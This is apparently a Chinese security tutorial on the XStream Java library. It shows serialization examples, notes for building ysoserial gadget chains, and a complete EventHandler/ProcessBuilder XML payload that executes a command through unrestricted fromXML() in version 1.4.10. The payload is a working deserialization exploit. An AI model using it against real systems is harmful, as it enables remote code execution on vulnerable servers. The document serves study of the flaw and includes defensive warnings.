参考:
https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用
https://blog.csdn.net/wenrennaoda/article/details/105564606 各版本漏洞触发原理
https://zhuanlan.zhihu.com/p/375239304
基本使用
XStream 的主要作用：Java 对象与 XML 互相转换。安全上需要注意：fromXML() 会按照 XML 中给出的类名去实例化对象，调用方在拿到返回值之前无法控制被实例化的类型——这正是后文各类反序列化漏洞（以及本文最后 EventHandler payload）的根源。不要对不可信输入直接调用 fromXML()。
引入依赖
<dependencies>
<!-- 1.4.10 is pinned on purpose: it is one of the versions the EventHandler payload at the
     end of this page targets. Do not copy this pin into real projects. -->
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.10</version>
</dependency>
</dependencies>
创建Student类
import java.io.Serializable;
/**
 * Plain mutable data holder used as the round-trip target for the XStream examples.
 * Three fields (id, name, school), a no-arg constructor, a full constructor,
 * getters/setters and a toString of the form "Student [id=.., name=.., school=..]".
 */
public class Student implements Serializable {
    private int id;
    private String name;
    private String school;

    /** Leaves every field at its default (0 / null). */
    public Student() {
    }

    /**
     * @param id     numeric identifier
     * @param name   student name (may be null)
     * @param school school name (may be null)
     */
    public Student(int id, String name, String school) {
        this.id = id;
        this.name = name;
        this.school = school;
    }

    public int getId() {
        return id;
    }

    public String getName() {
        return name;
    }

    public String getSchool() {
        return school;
    }

    public void setId(int id) {
        this.id = id;
    }

    public void setName(String name) {
        this.name = name;
    }

    public void setSchool(String school) {
        this.school = school;
    }

    /** Same text as the concatenated form: null fields print as "null". */
    @Override
    public String toString() {
        return String.format("Student [id=%d, name=%s, school=%s]", id, name, school);
    }
}
测试SerializeXml类:数组类与XML互转
package com.ser.test;
import com.thoughtworks.xstream.XStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
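/**
 * Round-trips a Student[] through XStream: serializeToXml() writes the XML to a file
 * (and prints it), deserialize() reads the file back and prints each element.
 *
 * Changes from the original: both file streams are now closed via try-with-resources
 * (the FileOutputStream/FileInputStream were never closed), and the file name is a
 * single constant instead of being repeated in each method.
 */
public class SerializeXml {

    /** File written by serializeToXml() and read back by deserialize(). */
    private static final String XML_FILE = "myObjtoXml.txt";

    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }

    /**
     * Serializes two Student objects (as an array) to XML_FILE and prints the same XML to stdout.
     * A failure to open/close the file is printed and the method still prints the XML.
     */
    public static void serializeToXml() {
        Student stu1 = new Student(10003, "claire", "hh");
        Student stu2 = new Student(10004, "leafly", "niubi");
        Student[] students = {stu1, stu2};
        XStream xstream = new XStream();
        // try-with-resources closes the stream even if toXML throws.
        try (FileOutputStream write = new FileOutputStream(XML_FILE)) {
            xstream.toXML(students, write);
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
        System.out.println(xstream.toXML(students));
    }

    /**
     * Reads XML_FILE back through XStream, casts the result to Student[] and prints each element.
     *
     * SECURITY (intentional for this harness): this XStream instance has no type restrictions,
     * so fromXML() will instantiate whatever class names appear in the file. That is the
     * deserialization attack surface the payloads on this page target: the object graph is
     * built inside fromXML(), before the cast below runs, so a ClassCastException here does
     * not mean a payload failed to execute. Production code must never call fromXML() on
     * attacker-controlled input without a type whitelist (XStream's allowTypes /
     * allowTypesByWildcard security framework, e.g. allowTypes(new Class[]{Student.class})).
     */
    public static void deserialize() {
        XStream xstream = new XStream();
        Student[] students = null;
        try (FileInputStream reader = new FileInputStream(XML_FILE)) {
            students = (Student[]) xstream.fromXML(reader);
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
        if (students != null) {
            for (Student student : students) {
                System.out.println(student);
            }
        }
    }
}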
运行后生成XML文件
<com.ser.test.Student-array>
<com.ser.test.Student>
<id>10003</id>
<name>claire</name>
<school>hh</school>
</com.ser.test.Student>
<com.ser.test.Student>
<id>10004</id>
<name>leafly</name>
<school>niubi</school>
</com.ser.test.Student>
</com.ser.test.Student-array>
测试SerializeXml类:单个类与XML互转
package com.ser.test;
import com.thoughtworks.xstream.XStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
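/**
 * Round-trips a single Student through XStream: serializeToXml() writes the XML to a file
 * (and prints it), deserialize() reads the file back and prints the object.
 *
 * Changes from the original: both file streams are now closed via try-with-resources
 * (the FileOutputStream/FileInputStream were never closed), the stray empty statement
 * after the Student construction is gone, and the file name is a single constant.
 */
public class SerializeXml {

    /** File written by serializeToXml() and read back by deserialize(). */
    private static final String XML_FILE = "myObjtoXml.txt";

    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }

    /**
     * Serializes one Student to XML_FILE and prints the same XML to stdout.
     * A failure to open/close the file is printed and the method still prints the XML.
     */
    public static void serializeToXml() {
        Student stu1 = new Student(10003, "claire", "hh");
        XStream xstream = new XStream();
        // try-with-resources closes the stream even if toXML throws.
        try (FileOutputStream write = new FileOutputStream(XML_FILE)) {
            xstream.toXML(stu1, write);
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
        System.out.println(xstream.toXML(stu1));
    }

    /**
     * Reads XML_FILE back through XStream, casts the result to Student and prints it.
     *
     * SECURITY (intentional for this harness): this XStream instance has no type restrictions,
     * so fromXML() will instantiate whatever class names appear in the file. That is the
     * deserialization attack surface the payloads on this page target: the object graph is
     * built inside fromXML(), before the cast below runs, so a ClassCastException here does
     * not mean a payload failed to execute. Production code must never call fromXML() on
     * attacker-controlled input without a type whitelist (XStream's allowTypes /
     * allowTypesByWildcard security framework, e.g. allowTypes(new Class[]{Student.class})).
     */
    public static void deserialize() {
        XStream xstream = new XStream();
        try (FileInputStream reader = new FileInputStream(XML_FILE)) {
            Student stu1 = (Student) xstream.fromXML(reader);
            System.out.println(stu1);
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}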
生成XML如下:
<com.ser.test.Student>
<id>10003</id>
<name>claire</name>
<school>hh</school>
</com.ser.test.Student>
探测：URLDNS（用 ysoserial 的 URLDNS 链配合 DNSLog 平台，先确认目标确实会反序列化我们的 XML，再换成执行命令的 gadget）
POC生成
在 IDEA 中导入 marshalsec 项目，并把 ysoserial 引入为依赖
找到想修改的gadgets,这里以CommonsBeanutils为例子
注释掉原有生成 object 的逻辑，替换成调用 ysoserial 生成 gadget 对象的逻辑
把生成的 XML 保存为上面代码读取的文件后，注释掉源码 main() 中对 serializeToXml() 的调用，只执行 deserialize() 去解析该 XML，验证 gadget 是否触发
生成依赖于CommonsBeanutils1直接执行命令的exp
如下。因为这里不需要借助 LDAP 远程加载，所以顺着 ysoserial 的 exp 生成逻辑重写一遍代码即可，例如目标 gadget 为 CommonsBeanutils1 时直接执行 whoami 等命令；如果需要注入内存马，则替换 ysoserial 中对应的模块。
其他EXP
基于 EventHandler（动态代理 + java.beans.EventHandler → ProcessBuilder）的 payload，版本要求：1.4.10、1.4.6、1.4.5。注意下面 payload 中的命令是 macOS 的 open，在其他平台上需要换成对应的命令。
<!-- Payload for the harness above. fromXML() builds this whole object graph before the
     caller's cast to Student/Student[] runs, so the command executes even though the
     cast afterwards fails. -->
<sorted-set>
<string>foo</string>
<!-- A java.lang.Comparable dynamic proxy whose invocation handler is an EventHandler.
     The intent is that adding the proxy to the sorted set invokes compareTo(), which the
     EventHandler forwards to the configured target/action below. -->
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<!-- target/action = ProcessBuilder.start(): the command below is macOS-specific
     ("open" + Calculator.app); replace it for other platforms. -->
<target class="java.lang.ProcessBuilder">
<command>
<string>open</string>
<string>/System/Applications/Calculator.app</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>